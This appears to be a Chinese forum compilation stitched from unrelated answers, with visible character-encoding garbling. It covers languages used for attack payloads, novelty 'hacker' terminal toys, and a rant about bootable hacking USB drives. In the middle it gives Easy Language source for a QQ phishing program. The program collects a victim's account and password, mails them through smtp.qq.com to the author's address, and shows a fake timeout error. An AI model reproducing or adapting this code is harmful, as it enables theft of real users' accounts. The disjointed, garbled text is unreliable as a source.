一般不會(huì)只使用一種語言的，取決于具體的攻擊場景。 比如說需要攻擊某個(gè)漏洞的時(shí)候，一般需要把一段惡意代碼送到目標(biāo)機(jī)器里。這段惡意代碼行話叫“payload”，一般只能根據(jù)漏洞成因選擇特定的編程語言：

XSS / CSRF 漏洞一般只能用 JavaScript。SQL注入一般只能構(gòu)造畸形SQL語句，命令執(zhí)行類的會(huì)摻一點(diǎn)bash、DOS命令。反序列化漏洞一般用JSON、XML等，取決于具體的數(shù)據(jù)交換語言。溢出漏洞一般用匯編、C編寫shellcode，而且一般需要用到專門的 Jump-Oriented Compiler。拿Web Shell的時(shí)候，需要根據(jù)當(dāng)前Web服務(wù)器配置選擇相應(yīng)的ASP、PHP、ASPX等語言。另外，將payload送入目標(biāo)機(jī)器一般需要構(gòu)造特殊的提交方式： 如果需要構(gòu)造畸形HTTP請(qǐng)求的話，我一般選擇Python，requests庫真的很好用。如果需要在套接字層直接提交TCP/UDP數(shù)據(jù)的話，我一般選擇C，也會(huì)考慮Python。剩下的情形對(duì)語言一般就沒有強(qiáng)制要求了，我平時(shí)大概隨心情在 Go 和 Python 之間選一個(gè)。

我給大家介紹一下如何用一些老式、比較復(fù)古的且實(shí)用的小工具來讓我們瞬間成為黑客的。

雖然目前有很多漂亮的 GUI，比如 Hacker Typer：

Hacker Typer

或者 GEEKtyper.com 的網(wǎng)頁版本：

GEEKtyper.com

上述兩個(gè)小工具，每個(gè)人都可以打開網(wǎng)頁，進(jìn)行操作。

但是如果你想要看起來更老派，更專業(yè)，可以考慮使用 Cool Retro Term：

Swordfish90/cool-retro-term

它是一個(gè)終端模擬器，模仿陰極管屏幕的外觀和感覺，可以看下面的圖片。相比于其他終端模擬器，它被設(shè)計(jì)的更加美觀、可自定義且占用很小的存儲(chǔ)空間。

我用易語言寫的一個(gè)QQ盜號(hào)源碼，其中你的QQ號(hào)和小號(hào)的QQ號(hào)和密碼都需要改一下。代碼如下（第一個(gè)編輯框內(nèi)容為帳號(hào)，第二個(gè)為密碼）：.版本 2.支持庫 internet.子程序 __啟動(dòng)窗口_創(chuàng)建完畢連接發(fā)信服務(wù)器 (“smtp.qq.com”, , “你小號(hào)QQ號(hào)”, “你小號(hào)QQ號(hào)密碼”, ).子程序 _按鈕1_被單擊發(fā)送郵件 (“QQ釣魚程序”, “帳號(hào)：” ＋ 編輯框1.內(nèi)容 ＋ #換行符 ＋ “密碼：” ＋ 編輯框2.內(nèi)容, “你小號(hào)的QQ號(hào)”, ,，“你大號(hào)的QQ號(hào)” )信息框 (“登陸超時(shí)，錯(cuò)誤代碼：00000000x1”, 0, )

沒有所謂的黑客u盤，不是說他把bt五這樣的系統(tǒng)裝到u盤里面，然后啟動(dòng)的時(shí)候選擇優(yōu)盤啟動(dòng)。

這樣就進(jìn)入滲透系統(tǒng)了 你連這個(gè)優(yōu)盤到底是什么一回事，你都不能夠理解，你就別玩什么黑客了